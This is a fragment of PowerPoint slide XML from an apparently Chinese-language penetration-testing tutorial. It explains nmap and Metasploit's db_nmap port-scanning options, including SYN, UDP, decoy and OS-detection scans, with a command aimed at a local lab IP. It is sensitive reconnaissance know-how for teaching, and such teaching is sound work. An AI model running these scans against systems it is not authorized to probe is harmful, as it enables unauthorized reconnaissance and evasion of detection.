            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4EC5E2-5E83-4EB3-9F94-BD4BAF0F574C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556443" y="2791839"/>
            <a:ext cx="2662908" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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3245"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="6324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扫描工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611505" y="1313815"/>
            <a:ext cx="10968990" cy="5373370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Nmap             </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nmap -p-  -sS -sV -n -v  -oX demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.xml 目标主机</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-p            </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定扫描的端口范围，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-p-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扫描所有端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> SYN Scan (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这是一个基本的扫描方式,它被称为半开放扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Nmap发送SYN包到远程主机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-sV                </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>版本检测是用来扫描目标主机和端口上运行的软件的版本</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="6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--open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>仅仅</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示开启的端口</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="6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200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--reason        </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示端口处于特殊状态</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="6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-n  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不进行dns解析操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（本地搭建环境，不用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="6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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                 XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（我们需要导入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>里面，以便我们更好的 下次查看）</a:t>
            </a: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-sT        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>连接扫描</a:t>
            </a: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-sU  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>             UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扫描</a:t>
            </a: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-D           </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   隐蔽扫描，指定扫描的源地址列表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" spc="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>操作系统扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin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191"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="7819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端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——db_nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all 192.168.177.144 -p-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Pn：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>跳过主机发现过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sTV：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>TCP扫描和检测开放端口服务版本信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-T4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>：设置时间模板，加速扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
